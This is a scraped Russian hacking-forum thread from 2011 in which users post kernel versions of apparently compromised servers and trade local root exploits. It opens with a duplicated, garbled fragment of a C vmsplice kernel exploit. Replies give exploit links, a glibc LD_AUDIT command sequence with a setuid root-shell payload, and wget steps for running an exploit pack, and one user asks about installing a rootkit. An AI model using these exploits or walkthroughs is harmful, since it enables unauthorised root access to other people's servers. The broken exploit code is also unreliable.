int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
void kernel_code()
{
int i;
uint *p = get_current();
for (i = 0; i flags = 1 private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags = 1 private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;
/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE)
#include
#include
#include
#include
#include
#include
#include
#include
#include
//#include
#define PAGE_SIZE getpagesize()
#define __KERNEL__
#include
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
void kernel_code()
{
int i;
uint *p = get_current();
for (i = 0; i flags = 1 private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags = 1 private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;
/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE)
скомпилился но не помогло
ты просил помочь с ошибками...ты же не думал, что рабочий приватный сплойт будет выложен в паблик с такой смешной недоработкой
C-r-A-c-K
20.07.2011, 15:07
будьте так любезны, подберите сплоит под
OS version: Linux version 2.6.32-3-amd64 (Debian 2.6.32-9) (maks@debian.org) (gcc version 4.3.4 (Debian 4.3.4-8) ) #1 SMP Wed Feb 24 18:07:42 UTC 2010
Distr name: Debian GNU/Linux 6.0
пробовал _1337day.com/exploits/14601
но не разобрался как с ним работать
пробовал r00t.sh (не запустился)
пробовал через libpcprofile.so нет прав на запись..
будьте так любезны, подберите сплоит под
OS version: Linux version 2.6.32-3-amd64 (Debian 2.6.32-9) (maks@debian.org) (gcc version 4.3.4 (Debian 4.3.4-8) ) #1 SMP Wed Feb 24 18:07:42 UTC 2010
Distr name: Debian GNU/Linux 6.0
пробовал _1337day.com/exploits/14601
но не разобрался как с ним работать
пробовал r00t.sh (не запустился)
пробовал через libpcprofile.so нет прав на запись..
Судя по вашему сообщению через libpcprofile.so вы пробовали сделать выполнение крон...но данный дистрибутив должен пробиваться стандартным способом баги Glib...
вот перечень команд:
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3 payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
C-r-A-c-K
20.07.2011, 19:44
к сожалению такой метод не прошел.
запрещены хард-линки
ОС установленна в отдельный сектор, где не нашел ни единой папки с правами на запись.
посмотрите что-нибудь еще пожалуйста.
к сожалению такой метод не прошел.
запрещены хард-линки
ОС установленна в отдельный сектор, где не нашел ни единой папки с правами на запись.
посмотрите что-нибудь еще пожалуйста.
ну прав на запись там и не должно нигде быть..в том методе, права на запись нужны только в папке tmp...а там они всегда есть...
пройбуй роберт ю сак, фулл нельсон.
будьте так любезны, подберите сплоит под
OS version: Linux version 2.6.32-3-amd64 (Debian 2.6.32-9) (maks@debian.org) (gcc version 4.3.4 (Debian 4.3.4-8) ) #1 SMP Wed Feb 24 18:07:42 UTC 2010
Distr name: Debian GNU/Linux 6.0
пробовал _1337day.com/exploits/14601
но не разобрался как с ним работать
пробовал r00t.sh (не запустился)
пробовал через libpcprofile.so нет прав на запись..
это не поможет?
http://turboupload.com/n0f9pp2a1udn
C-r-A-c-K
21.07.2011, 02:43
vasykas, спасибо
помог сплоит ia32syscall emulation
Linux ****** 2.6.32.38-bitrix10 #1 SMP Fri Apr 22 04:08:18 MSD 2011 x86_64
Подскажите сплойт.
C-r-A-c-K
22.07.2011, 21:28
exmicru, имхо не найдешь, слишком свежий.
Уважаемые постояльцы, подскажите что-нибудь для
Linux version 2.6.27.5-117.fc10.x86_64 (mockbuild@x86-1.fedora.phx.redhat.com) (gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) ) #1 SMP Tue Nov 18 11:58:53 EST 2008
p.s. при компилировании чего-либо ругается на инклуды /usr/include/string.h:39: error: expected declaration specifiers or '...' before 'size_t' и т.д.
может кто подскажет возможно рабочий вариант, тогда буду эксперементировать уже с библиотеками.
exmicru, имхо не найдешь, слишком свежий.
Уважаемые постояльцы, подскажите что-нибудь для
Linux version 2.6.27.5-117.fc10.x86_64 (mockbuild@x86-1.fedora.phx.redhat.com) (gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) ) #1 SMP Tue Nov 18 11:58:53 EST 2008
p.s. при компилировании чего-либо ругается на инклуды /usr/include/string.h:39: error: expected declaration specifiers or '...' before 'size_t' и т.д.
может кто подскажет возможно рабочий вариант, тогда буду эксперементировать уже с библиотеками.
Enlightenment, Glib
Подскажите, что можно тут попробовать?
FreeBSD ****** 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Thu Oct 26 14:44:23 PDT 2006
Подскажите, что можно тут попробовать?
FreeBSD ****** 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Thu Oct 26 14:44:23 PDT 2006
http://www.securitylab.ru/poc/275399.php
http://www.exploit-db.com/exploits/9488/
http://security-sh3ll.blogspot.com/2009/08/freebsd-61-local-root-vulnerability.html
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1302-freebsd-6-1-local-root-vulnerability-0-day.html
че нибудь здесь посмотри
Не один из них так и не скомпилился.. Ошибки валятся.. Могу привести их сюда, если необходимо..
Не один из них так и не скомпилился.. Ошибки валятся.. Могу привести их сюда, если необходимо..
давай
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1302-freebsd-6-1-local-root-vulnerability-0-day.html
###########################
1.c: In function `main':
1.c:73: warning: assignment from incompatible pointer type
1.c:83: warning: passing arg 3 of `pthread_create' from incompatible pointer type
1.c:84: warning: passing arg 3 of `pthread_create' from incompatible pointer type
1.c:107:2: warning: no newline at end of file
/var/tmp//ccvijMZ6.o(.text+0x1ee): In function `main':
: undefined reference to `pthread_create'
/var/tmp//ccvijMZ6.o(.text+0x203): In function `main':
: undefined reference to `pthread_create'
###########################
http://www.exploit-db.com/exploits/9488/
############################
/var/tmp//ccOFVRly.o(.text+0x1dd): In function `main':
: undefined reference to `pthread_create'
/var/tmp//ccOFVRly.o(.text+0x1f2): In function `main':
: undefined reference to `pthread_create'
############################
По одному из линков вообще ДоС..
з.ы. Не ругаться, я в Си подобных языках вообще ноль.
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1302-freebsd-6-1-local-root-vulnerability-0-day.html
###########################
1.c: In function `main':
1.c:73: warning: assignment from incompatible pointer type
1.c:83: warning: passing arg 3 of `pthread_create' from incompatible pointer type
1.c:84: warning: passing arg 3 of `pthread_create' from incompatible pointer type
1.c:107:2: warning: no newline at end of file
/var/tmp//ccvijMZ6.o(.text+0x1ee): In function `main':
: undefined reference to `pthread_create'
/var/tmp//ccvijMZ6.o(.text+0x203): In function `main':
: undefined reference to `pthread_create'
###########################
http://www.exploit-db.com/exploits/9488/
############################
/var/tmp//ccOFVRly.o(.text+0x1dd): In function `main':
: undefined reference to `pthread_create'
/var/tmp//ccOFVRly.o(.text+0x1f2): In function `main':
: undefined reference to `pthread_create'
############################
По одному из линков вообще ДоС..
з.ы. Не ругаться, я в Си подобных языках вообще ноль.
А гугл переводчик использовать, религия не позволяет ?
по первой ошибке...
В конце файла добавь пустую строку, как просит компилятор...
снова скомпилируй и запускай....
P.S. Если выскакивают при компиляции warning сообщения, это не мешает сплойту скомпилится!
А гугл переводчик использовать, религия не позволяет ?
по первой ошибке...
В конце файла добавь пустую строку, как просит компилятор...
снова скомпилируй и запускай....
P.S. Если выскакивают при компиляции warning сообщения, это не мешает сплойту скомпилится!
Давай не умничать, ок? Причем тут гугл переводчик? Там конкретно ошибка:
/var/tmp//ccvijMZ6.o(.text+0x1ee): In function `main':
: undefined reference to `pthread_create'
/var/tmp//ccvijMZ6.o(.text+0x203): In function `main':
: undefined reference to `pthread_create'
И эту лабуду я сам могу перевести, без всяких переводчиков, но толку? Я ясно написал, что в Си подобных языках я ноль, и исправить эту ошибку я не в силах. Если по факту знаешь, в чем ошибка, напиши, буду благодарен.
з.ы.: То, что new line в конце поставить нужно, не сложно догадаться. И опять же, толку?
Давай не умничать, ок? Причем тут гугл переводчик? Там конкретно ошибка:
/var/tmp//ccvijMZ6.o(.text+0x1ee): In function `main':
: undefined reference to `pthread_create'
/var/tmp//ccvijMZ6.o(.text+0x203): In function `main':
: undefined reference to `pthread_create'
И эту лабуду я сам могу перевести, без всяких переводчиков, но толку? Я ясно написал, что в Си подобных языках я ноль, и исправить эту ошибку я не в силах. Если по факту знаешь, в чем ошибка, напиши, буду благодарен.
з.ы.: То, что new line в конце поставить нужно, не сложно догадаться. И опять же, толку?
А кто умничает ?
1. сплойт нужно компилить с флагом -lpthread
2. Твоя ошибка появляется когда этот флаг не используется!
3. Вот строка из man gcc:
-pthread
Adds support for multithreading with the pthreads library. This
option sets flags for both the preprocessor and linker.
4. Сплойт работает на x64 системах.
Попробовал с флагом -lpthread, ничего не происходит, никакого output'а..
А под x86 что нибудь есть?
fairy_long_nose
27.07.2011, 23:37
cat /etc/issue;uname -a;id Debian GNU/Linux 3.1 \n \l
Linux sh4-2 2.6.8-13-amd64-k8-smp #1 SMP Wed Feb 20 05:09:36 UTC 2008 x86_64 GNU/Linux
uid=1632(ftp4534534) gid=100(users) Gruppen=100(users)
Ни туда, ни сюда... Может я что пропустил? Подскажите что может подойти под него.
Ни туда, ни сюда... Может я что пропустил? Подскажите что может подойти под него.
Попробуй вот это:
http://webcache.googleusercontent.com/search?q=cache:9Tz4RCIUYLoJ:www.jkmwpkl.gov.my/1.txt+http://www.jkmwpkl.gov.my/1.txt&cd=3&hl=ru&ct=clnk&gl=ua&client=firefox&source=www.google.com.ua
Линк на вебкеш даю т.к. страницы на сайте уже нету...
Лучше попробуй enlightenment _http://grsecurity.net/~spender/enlightenment.tgz, она точно пробить должна....
Expl0ited
28.07.2011, 16:16
Ни туда, ни сюда... Может я что пропустил? Подскажите что может подойти под него.
1. wget http://www.grsecurity.net/~spender/enlightenment.tgz
2. tar -zxf enlightenment.tgz
3. cd enlightenment
4. ./run_null_exploits.sh
5. ???
6. PROFIT!!!
Сохрани где нибудь, пробив ~ до июня 2009 года
fairy_long_nose
28.07.2011, 22:41
Спасибо ребят, попробую. Сам думал, что 100% должен сработать enlightenment, но не сраслось. Дохрена хидеров не хватает для сборки. Хоть такую же систему поднимай на виртуалке что бы только бинарник собрать ) Чем я наверно сегодня ночью и займусь
FreeBSD 7.2-RELEASE-p6
есть ли рабочие сплойты под нее?
есть ли рабочие сплойты под нее?
Полный вывод команды uname -a показывать надо!
Покажи вывод команды:
ls-al/libexec;uname-a;
FreeBSD x.x.x 7.2-RELEASE-p6 FreeBSD 7.2-RELEASE-p6 #2: Thu Feb 4 14:31:52 MSK 2010 root@x.x.x:/usr/obj/usr/src/sys/RELAY i386
вот результат выполнения обоих комманд
туплю...
total 332
drwxr-xr-x 2 root wheel 512 3 |++ 2010 .
drwxr-xr-x 20 root wheel 512 17 -++ 2011 ..
-r-xr-xr-x 1 root wheel 167292 1 -++ 2010 ld-elf.so.1
-r-xr-xr-x 1 root wheel 167292 29 --- 2009 ld-elf.so.1.old
ls -al /libexec
вот результат выполнения обоих комманд
Попробуй вот этот:
_http://cworld.org.ua/news/exploit-fbsd-rtld-full-package/
если не возьмёт, тогда вот этот:
_http://rdot.org/forum/showthread.php?t=601
P.S. второй сплойт там в 3-х вариантах...тему полистай...
Сохрани где нибудь, пробив ~ до июня 2009 года
Поправочка, приблизительно до начала 2010, там же еще Pipe.c)
FreeBSD --- 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008
Что под этот взять?
FreeBSD --- 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008
Попробуй вот этот:
_http://cworld.org.ua/news/exploit-fbsd-rtld-full-package/
если не возьмёт, тогда вот этот:
_http://rdot.org/forum/showthread.php?t=601
Ну и http://1337day.com/exploits/8002
http://1337day.com/exploits/7910
попробуй...
P.S. Выкладывай полностью сведения о системе.
Ну и http://1337day.com/exploits/8002
http://1337day.com/exploits/7910
попробуй...
P.S. Выкладывай полностью сведения о системе.
FreeBSD --- 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
FreeBSD --- 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008
Что под этот взять?
Вот этот пробьёт:
http://www.exploit-db.com/exploits/10255/
Linux 2.6.9-023stab053.2-enterprise #1 SMP Mon Oct 25 18:37:43 MSD
2010 i686 будет что под него?
Linux 2.6.9-023stab053.2-enterprise #1 SMP Mon Oct 25 18:37:43 MSD
2010 i686 будет что под него?
http://turboupload.com/qb7qlb5ctfhf
попробуй эти
Linux version 2.6.18-194.11.4.el5 (mockbuild@builder10.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Tue Sep 21 05:04:09 EDT 2010
Посмотрите у кого что есть
Expl0ited
02.08.2011, 20:12
Linux version 2.6.18-194.11.4.el5 (mockbuild@builder10.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Tue Sep 21 05:04:09 EDT 2010
Посмотрите у кого что есть
df -h
ls -lia /lib/libc*
кинь
DJ ][akep
03.08.2011, 15:15
ЧТо подойдет под:
Linux v3 2.6.32-4-pve #1
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 75G 3.3G 72G 5% /
tmpfs 1.5G 0 1.5G 0% /lib/init/rw
tmpfs 1.5G 0 1.5G 0% /dev/shm
$ ls -lia /lib/libc*
28819996 -rwxr-xr-x 1 root root 1294572 Jan 8 2011 /lib/libc-2.7.so
28819912 lrwxrwxrwx 1 root root 11 Jul 18 22:40 /lib/libc.so.6 -> libc-2.7.so
28819985 lrwxrwxrwx 1 root root 14 Jul 18 22:40 /lib/libcap.so.1 -> libcap.so.1.10
28820010 -rw-r--r-- 1 root root 11024 Apr 13 2004 /lib/libcap.so.1.10
28819925 lrwxrwxrwx 1 root root 14 Jul 18 22:40 /lib/libcap.so.2 -> libcap.so.2.11
28819820 -rw-r--r-- 1 root root 13364 Jul 26 2008 /lib/libcap.so.2.11
28820070 lrwxrwxrwx 1 root root 17 Jul 18 22:40 /lib/libcfont.so.0 -> libcfont.so.0.0.0
28819814 -rw-r--r-- 1 root root 10712 Apr 15 2008 /lib/libcfont.so.0.0.0
28819800 -rw-r--r-- 1 root root 185816 Jan 8 2011 /lib/libcidn-2.7.so
28819923 lrwxrwxrwx 1 root root 14 Jul 18 22:40 /lib/libcidn.so.1 -> libcidn-2.7.so
28820007 lrwxrwxrwx 1 root root 17 Jul 18 22:40 /lib/libcom_err.so.2 -> libcom_err.so.2.1
28819797 -rw-r--r-- 1 root root 8676 Oct 13 2008 /lib/libcom_err.so.2.1
28819926 lrwxrwxrwx 1 root root 19 Jul 18 22:40 /lib/libconsole.so.0 -> libconsole.so.0.0.0
28819991 -rw-r--r-- 1 root root 72816 Apr 15 2008 /lib/libconsole.so.0.0.0
28819981 -rw-r--r-- 1 root root 38296 Jan 8 2011 /lib/libcrypt-2.7.so
28820011 lrwxrwxrwx 1 root root 15 Jul 18 22:40 /lib/libcrypt.so.1 -> libcrypt-2.7.so
28819811 lrwxrwxrwx 1 root root 19 Jul 18 22:40 /lib/libctutils.so.0 -> libctutils.so.0.0.0
28819805 -rw-r--r-- 1 root root 17024 Apr 15 2008 /lib/libctutils.so.0.0.0
Expl0ited
03.08.2011, 15:45
[akep"]
DJ ][akep said:
ЧТо подойдет под:
Linux v3 2.6.32-4-pve #1
uname -a
есть че нибудь
Linux 2.6.26.8-57.fc8PAE #1 SMP Thu Dec 18 EST 2008 i686 i686 i386 GNU/Linux
стандартные типа sendpage 1,2,3 robert_you suck не подходят
есть че нибудь
Linux 2.6.26.8-57.fc8PAE #1 SMP Thu Dec 18 EST 2008 i686 i686 i386 GNU/Linux
стандартные типа sendpage 1,2,3 robert_you suck не подходят
Glibc должен взять
Glibc должен взять
ни Glibc не берет ни Fuzzing
srochno podskazhite pod eto:
Linux s206 2.6.26-2-amd64 #1 SMP Mon Jun 13 16:29:33 UTC 2011 x86_64
srochno podskazhite pod eto:
Linux s206 2.6.26-2-amd64 #1 SMP Mon Jun 13 16:29:33 UTC 2011 x86_64
ничего. не рутабельное ядро.
C-r-A-c-K
07.08.2011, 10:54
Люди добрые. откомпилируйте сплойт _exploit-db.com/exploits/15024/
на ядре Fedora release 10. 2.6.27.5-117.fc10.x86_64 #1 SMP Tue Nov 18 11:58:53 EST 2008 x86_64
или около того. админ злой, все инклюды поломал) либо кто-то, кто до меня порутал.
Люди добрые. откомпилируйте сплойт _exploit-db.com/exploits/15024/
на ядре Fedora release 10. 2.6.27.5-117.fc10.x86_64 #1 SMP Tue Nov 18 11:58:53 EST 2008 x86_64
или около того. админ злой, все инклюды поломал) либо кто-то, кто до меня порутал.
он не работает на федоре...там шелл коды править нужно!
На твоём ядре должен работать Glibc..
C-r-A-c-K
07.08.2011, 14:15
sevenup, будь добр откомпилируй на glibs на подобном ядре.
gcc ругается на любые инклюды.
Expl0ited
07.08.2011, 14:49
там только откомпилировать нужно:
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
C-r-A-c-K
07.08.2011, 15:05
там только откомпилировать нужно:
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
при компиляции выдает
collect2: cannot find 'ld'
будьте добры, откомпилируйте, и скиньте у кого получилось.
$ id
uid=0(root) gid=0(root) grupos=48(apache),11193(ftpgroup1)
не могу руткит поставить с такими правами, почему?
winstrool
08.08.2011, 03:01
FreeBSD *** 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009
с эти кто может помочь?
народ) мб есть у кого линк на видео по рутанью. ну т.е. что бы я хоть как то вник как рутать)
абвгдешка
08.08.2011, 15:50
народ) мб есть у кого линк на видео по рутанью. ну т.е. что бы я хоть как то вник как рутать)
/thread222922.html
с эти кто может помочь?
http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_campaign=Feed%3A+attackvector+%28Attack+Vector %29
http://seclists.org/fulldisclosure/2009/Nov/371
Есть что под это?
Linux 2.6.18-194.3.1.el5.028stab069ave01.6ent #1 SMP Sun May 30 21:22:39 CEST 2010 i686 i686 i386 GNU/Linux
antiaudomain
09.08.2011, 06:18
Всем привет!
Кто-нибудь таки подобрал что-нибудь под
Linux ******** 2.6.9-89.0.11.EL #1 Mon Aug 31 10:56:13 EDT 2009 i686 athlon i386 GNU/Linux
? очень-очень надо, ответа так и не нашел, перепробовал кучу тоже (
Всем привет!
Кто-нибудь таки подобрал что-нибудь под
Linux ******** 2.6.9-89.0.11.EL #1 Mon Aug 31 10:56:13 EDT 2009 i686 athlon i386 GNU/Linux
? очень-очень надо, ответа так и не нашел, перепробовал кучу тоже (
glibc может взять, пробовали?
А ты пробовал enlightenment (мой любимый сплоитпак), судя по году должен помочь...
antiaudomain
09.08.2011, 20:29
А ты пробовал enlightenment (мой любимый сплоитпак), судя по году должен помочь...
они проапгрейдились уже до:
2.6.9-89.33.1.EL #1 Mon Nov 15 18:45:41 EST 2010 i686
что посоветуете, люди добрые?
они проапгрейдились уже до:
2.6.9-89.33.1.EL #1 Mon Nov 15 18:45:41 EST 2010 i686
что посоветуете, люди добрые?
Забить...это ядро не пробить.
Всем привет!
Кто-нибудь таки подобрал что-нибудь под
Linux ******** 2.6.9-89.0.11.EL #1 Mon Aug 31 10:56:13 EDT 2009 i686 athlon i386 GNU/Linux
? очень-очень надо, ответа так и не нашел, перепробовал кучу тоже (
этот попробуй
http://turboupload.com/v3xtazklfijz
2.6.18-238.12.1.el5xen #1 SMP Tue May 31 14:02:29 EDT 2011
Если 2011, то значит все пропатчено и не повыситься?
Если 2011, то значит все пропатчено и не повыситься?
Ну не факт что пропатчено.. просто время сборки ядра.
Ну не факт что пропатчено.. просто время сборки ядра.
Учитывая что у него ядро, которое появилось в 2011 году...это значит что то что оно пропатчено это факт.
Linux ----- 2.6.26-2-686 #1 SMP Mon Jun 21 05:58:44 UTC 2010 i686
не берёт enlightenment
что посоветуете
Linux ----- 2.6.26-2-686 #1 SMP Mon Jun 21 05:58:44 UTC 2010 i686
не берёт enlightenment
что посоветуете
http://ptresearch.blogspot.com/2011/04/fuzzing-and-exploitation-of.html
http://www.exploit-db.com/exploits/9575/
http://www.ziddu.com/download/15566135/bitchscan.tar.gz.html
Linux ******** 2.6.18-028stab060.2 #1 SMP Tue Jan 13 10:24:09 MSK 2009 i686 i686 i386 GNU/Linux
Linux ******** 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64 GNU/Linux
есть что-нибудь?
Linux ----- 2.6.26-2-686 #1 SMP Mon Jun 21 05:58:44 UTC 2010 i686
не берёт enlightenment
что посоветуете
Glibc возьмёт 100%
Linux ******** 2.6.18-028stab060.2 #1 SMP Tue Jan 13 10:24:09 MSK 2009 i686 i686 i386 GNU/Linux
есть что-нибудь?
sendpage 3
oODungVTOo
11.08.2011, 17:21
Linux 2.6.9-101.ELsmp #1 SMP Fri May 27 18:57:30 EDT 2011 i686
help me, pls
Expl0ited
11.08.2011, 17:39
Linux 2.6.9-101.ELsmp #1 SMP Fri May 27 18:57:30 EDT 2011 i686
help me, pls
Не рутабельно
Подскажите что нить под это?
Linux 2.6.14 #3 SMP Mon Jun 18 13:11:46 EDT 2007 i686 GNU/Linux
P.S. Если можно киньте сразу компиленный. На серваке траблы с компиляцией, error's летят...
Подскажите что нить под это?
Linux 2.6.14 #3 SMP Mon Jun 18 13:11:46 EDT 2007 i686 GNU/Linux
P.S. Если можно киньте сразу компиленный. На серваке траблы с компиляцией, error's летят...
http://trav1an.t35.com/Localz/Localz-3
Expl0ited
11.08.2011, 22:40
Подскажите что нить под это?
Linux 2.6.14 #3 SMP Mon Jun 18 13:11:46 EDT 2007 i686 GNU/Linux
P.S. Если можно киньте сразу компиленный. На серваке траблы с компиляцией, error's летят...
Должен справится тот же glibc или enlightment, или если проблема с компиляцией, то можно попробывать:
http://th3-0utl4ws.com/localroot/
Есть что под это чудо в паблике?))
Linux 2.6.36.2-grsec #1 SMP Thu Feb 17 04:24:57 EST 2011 x86_64
Подскажите, что есть для:
FreeBSD 8.2-RC3 FreeBSD 8.2-RC3 #0: Sun Jan 30 06:28:31 UTC 2011 amd64 ??
FreeBSD 7.3-RELEASE FreeBSD 7.3-RELEASE #0: Sun Mar 21 06:15:01 UTC 2010
Под такую бредню, что можно попробовать?
Linux 2.6.18-194.26.1.el5.028stab079.2 #1 SMP Fri Dec 17 19:25:15 MSK 2010 x86_64 x86_64 x86_64 GNU/Linux
FreeBSD www7.100mb.ru 6.2-RELEASE-p12 FreeBSD 6.2-RELEASE-p12 #0: Tue Nov 2 15:10:40 MSK 2010 root@www7.100mb.ru:/usr/obj/usr/src/sys/WWW7NEW i386
есть,что нить под них?
Linux 2.6.18-194.26.1.el5.028stab079.2 #1 SMP Fri Dec 17 19:25:15 MSK 2010 x86_64 x86_64 x86_64 GNU/Linux
FreeBSD www7.100mb.ru 6.2-RELEASE-p12 FreeBSD 6.2-RELEASE-p12 #0: Tue Nov 2 15:10:40 MSK 2010 root@www7.100mb.ru:/usr/obj/usr/src/sys/WWW7NEW i386
есть,что нить под них?
порпобуй этот
http://turboupload.com/d3hh9t4eyig4
FreeBSD 7.3-RELEASE FreeBSD 7.3-RELEASE #0: Sun Mar 21 06:15:01 UTC 2010
Под такую бредню, что можно попробовать?
этот не прокатит?
http://turboupload.com/5sk9lheojwsy
_Spamer_
13.08.2011, 14:29
snake Linux onweb.ru 2.6.30.10-105.2.23.fc11.i586 #1 SMP Thu Feb 11 06:51:26 UTC 2010 i686
---s--x--x 1 root root 63012 Mar 23 2010 /usr/bin/staprun
total 21556
drwxr-xr-x. 5 root root 4096 Feb 20 2010 .
drwxr-xr-x. 24 root root 4096 Feb 13 03:56 ..
-rw-r--r--. 1 root root 1093951 Dec 10 2009 System.map-2.6.27.41-170.2.117.fc10.i586
-rw-r--r--. 1 root root 1089995 Dec 16 2008 System.map-2.6.27.9-159.fc10.i586
